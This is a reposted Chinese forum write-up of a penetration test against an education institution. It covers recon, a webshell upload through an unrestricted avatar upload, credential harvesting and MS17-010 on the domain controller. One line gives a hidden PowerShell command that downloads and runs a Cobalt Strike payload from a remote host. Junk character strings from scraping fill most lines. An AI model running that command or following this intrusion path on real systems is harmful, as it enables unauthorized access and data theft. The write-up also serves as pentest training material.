W* e' J O" h
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路3 G: z6 T3 _; f1 t8 |5 B
9 \3 k% V, p% a* |! T! F
+ f# }2 m& G) i2 E* a
/ z* j, e8 L6 c2 T# E
2 G+ t U" w% L3 p( ?4 E1 ~- Q
; D' E7 u& ]4 z 正文 Y0 X5 N0 @4 v1 ~+ Z
# g. G9 M8 g4 D* b
. ?5 g$ Z2 f4 A! g . a( J# F2 p7 f8 s; |" a3 T
' S8 U i5 H" ^5 Q; [6 M/ ~4 r8 z- v! C T9 G9 J
目标:www.xxxx.com(一家教育机构)
) ]! A* W4 X Q2 M7 o7 P( R- E打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
- K3 P K/ C! Y# B: v0 f8 R# g
- K# d) E$ ^6 r. Y! q
6 u3 O h5 h* T! n- c ) P0 h% h2 `9 m: i) @# H
3 O- V' ?" }8 h4 k- W" Q( P/ [5 P C
进行了简单的信息搜集 & h% D: M! e3 Z; @, j, s# J( B
1 t( h9 x& v. _% }' t' g+ }5 p/ ~ b
, @8 x8 b2 D7 k+ b' x8 i
7 L9 e( G/ ~# D
$ c) ]- p _9 U3 u) x 子域名搜集% i0 h: N$ O) d0 c7 P' H' a
" j! t( W% O5 F3 s" H, ~
7 T: P4 U- L; S Z
, D0 o/ |( }. `9 I 4 w' w% p* O0 v4 |/ o9 n5 W
# T/ a# c# B$ d3 P4 [+ M% g fofa找资产
# e4 i8 Z" |, _% @0 Y. p( Q
: j! ~; l8 i$ K: N0 S( }/ G
% J8 L' n+ L- g f7 B% @
1 ~. l' q" u/ o& T1 f
K% v& I: o) H0 I0 U$ E & [! G) Z. l# t. i; [
8 ]6 _ U9 G0 ^5 @; u
4 V8 R* c. W5 E9 A$ N4 h" X6 C
一共七个资产。去重之后只有两个。 0 e7 Q' c. d1 I9 w
# G! ?+ e. E3 w
2 V R; u* E" i) d; p$ l4 G
- E# x) {9 h/ e- ]7 D; W5 @% W) u" o& J# z
目录探测" F! L6 |- N" i$ B( M
0 [' N3 @) [$ u5 J! [( x4 R( g6 G& H
3 I! L+ E3 M9 T
2 v0 ^. P- ^: O& O8 U" X9 e8 _5 }$ G% r# g d- R; H
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 g" y, d+ `, m/ D0 y7 y & Y3 Y6 E' _+ P* n
3 f, E- ^ }/ D
+ v3 g, X2 D0 E' W7 k
$ N) F, o8 T; C/ U4 m
我又尝试了通过修改返回包来绕过登录界面
; | H4 c6 ^( {$ f1 ~ # G5 D2 ]6 r* D+ n7 F
% ^) y5 G( [' ]7 }; o, d3 X+ A1 @+ k # N7 Y# o! X @* X
' i8 f2 G+ |4 L2 p2 S
) j8 g+ K$ R+ H' d 还是不行,尝试注入无果5 Q, x/ z- J/ A8 y+ [- W5 i
( E7 I& ?4 q a3 f+ N* W
: c: w7 {3 H w$ k) p" B * O% ?( E. E- C& w! g- {
( B) a% E( `7 l" ^$ Z8 G3 s/ [
8 | J' S0 a/ ?/ W9 M9 S 不过我目录探测出了一处Spring信息泄露
; p$ }- `3 y3 p 8 ~% ~ k5 R- P; E% [
8 x) p. i& W' I# s 5 N5 {% f. [, I. ^" [" s, [
8 s) i% G# [; J
& q X) Q: l0 E! g# A# p) f- |
/ R) ?" W6 Z" Z. e: v+ D- n7 K, a$ R" P
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
9 g+ R! a, v P2 B
0 S9 u j, }& f1 `9 M9 V1 E9 D+ a" s
$ ~' \( \* K& M2 ^$ h) l7 K + y9 |' ?8 M! @* W( t9 P# @( }
% f( ?; e E1 D- Y$ G 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
. z/ [& U p0 X7 Z
) ]6 L4 e/ u) _' j `$ L8 w* e& o- X: h" L
" O" Z$ {) Y9 P
& Q; z$ w' v) g2 V6 N% u' B
# h3 E% F3 t# C) J3 X6 I! Z 获取有些师傅到这一步就手机抓包电脑测了。0 }" V* C* k. S, s
+ T" e1 w; ]6 K" \: H; R2 ?9 l Y- `& i
" e* O0 B0 Q% m2 o8 k! D Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
9 v7 l/ A4 P) F1 S$ y' z8 c
- |! ?3 r7 C5 m# P! R
3 J' c5 ^1 H2 h- ? 其中在一个公众号发现了小程序,可以进行注册。
" H S6 D3 l$ F0 g! @
/ m! o+ a$ ^/ \1 q1 [+ N' d1 w4 @% m2 U! P, p' ?5 B" c! {
看到了头像上传,尝试上传获取WebShell
( l' V% p. T4 _" s* J4 A8 Q , m l4 ~1 R+ l
5 D5 Z6 K* N, o
) N. ^0 x& E8 w( h % |' q* V% j. R, }/ _8 l8 {
) A) U) J& @7 ?6 P$ W 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
' f2 p B3 E: u: q) y0 p8 }. o
% x/ H4 A6 `: E( D7 g3 n C/ ?" Y; W. T% C, o; u8 _7 S
, _# |+ ]9 ~( f6 j2 U* ?' P0 L9 V
* A! O) z) w4 S# r
3 K# @, W, f, h8 q+ o( F( G( u
然后上了大马+ e Z. T" V# Y1 q3 x7 T
1 h! S( q! _/ {
6 U" S+ J# y3 }$ E0 j( U ) g! |# _; V, V: k# V( F
5 T# ^0 V( D" i X" V7 O
" t* ~' P9 A5 `6 T' b * \$ V& z$ C( Q1 D
0 r- f' Z9 r* Y/ S1 }6 @
' b$ A+ p6 \2 I% g& D _ 通过翻找文件发现数据库账号密码
! H, M* j6 L# b" y( G" S ; s7 V: E; p/ n$ B
- D, r# D* @; h3 ^3 o2 n3 L6 F
$ I0 m K& r0 Q0 n1 {3 p
. C2 x4 B' f* M" u& Z7 u
& f# ~! s& i" t$ D: v2 ]6 i( W+ }
--内网渗透
# A/ k$ ]2 @, k$ \( f 2 [! P" e7 h* j6 g8 r' M. H
& e: W6 F2 v3 q' ]9 X
直接通过powershell执行 cs上线
5 e s: k6 V4 p, M) a8 ?/ e: z5 v
( v6 v! |' L% ?& E2 k) ]& ~0 S& ?# I. U
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"4 t9 d" u) r! f" o) n) s
3 H4 c& U/ u4 u/ p3 y; x& d9 ~1 Q$ u
4 g; l/ D* h" j8 X! \8 K4 g/ Q
( C' {3 s' h4 g
7 l: Z; i/ |/ z4 C; U( N( ]9 c
! V2 V r, u6 X0 J 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
- M9 M9 x. O" |9 ]5 D( A ( N1 J& f: H% d" C
* \! y9 L) j W- S& V2 ~! [/ B& ^
+ c- l7 n/ u& U0 [' }8 t; a " s4 I6 X8 @6 ^! D
. P$ a" k" X/ b9 }1 `/ N/ K/ c 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 . D1 N! d; w8 r+ m- N% ]0 e. v+ {
+ [3 F1 F4 t# s; c8 S6 X
. G# s P1 o# _0 }. h9 ~
# f9 i# z+ g, B& W
# H3 x. l& H8 G3 a! t! S* ` D+ K$ d1 z2 h7 N
* M0 z5 ?4 g" N* P : t2 l# {3 r1 B9 G1 Y7 ]* [
4 U! A7 d' o7 F' @& O6 Y6 | 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
r% ?" c- o w3 l) M+ t f $ e+ l5 f9 W6 Y) Q" b
" m' C J' b! G- ~+ Z% I
4 d* m7 l6 m1 `7 D" U3 o& q8 ~1 c' P( g( S2 n) N
! K9 O- k8 u2 o- e! R
! Q$ W' m v' M) s& m- I7 G+ C; o/ e# e: x6 D; L' v
; x! [8 x1 V+ f# N2 U- |
# w+ T2 ?8 ~7 n3 O i; E
: Z* M0 s" _* J
. O" a- N& X! K+ o' T( b* b& p" B: ?, w+ l* t; w# ~& g7 }
$ R9 Z0 `* A, _( a- R2 E7 i0 X
% }' z8 B8 }1 ?
& t {6 o z6 X7 L1 D 小结0 K/ c# p4 K4 X" A. C
6 g4 W, C# k6 c, N4 g4 Q3 t
, U) e/ k; W) ]1 ?+ Z 2 n; N/ k9 R+ a
- X* x: X( T2 x* q
+ {( p$ y3 G0 n) P 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! T% ]7 o t! h# U( `% I
: [1 X5 M& P4 @; `1 X {; d
% t" I0 s3 _4 [
6 m; \& D- L+ E& }4 x6 w
/ K) }% W; ?- K$ F% s& v# t( P1 A/ J, X. h2 V# W
- 1 S( K4 f# x2 I$ r/ G
# ~0 r6 v" r; S6 H. D
! X$ P5 J8 {2 r5 p8 L
-
7 L# y. F% m0 w% @; y& n
- `' }, I% E; K5 R1 F
! p1 [/ \7 H" _8 ^ 2 Z# P- n* F9 ]4 P, n) I7 [- F
6 q/ L% Z# G' F* v
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html" {' p$ |' ^9 q+ ~" |7 U z
0 p" |/ y* V$ z2 o- u2 h
$ n$ ^ V% T' N/ a+ H6 v( P6 ]
2 Z9 }2 L7 E# @* i
|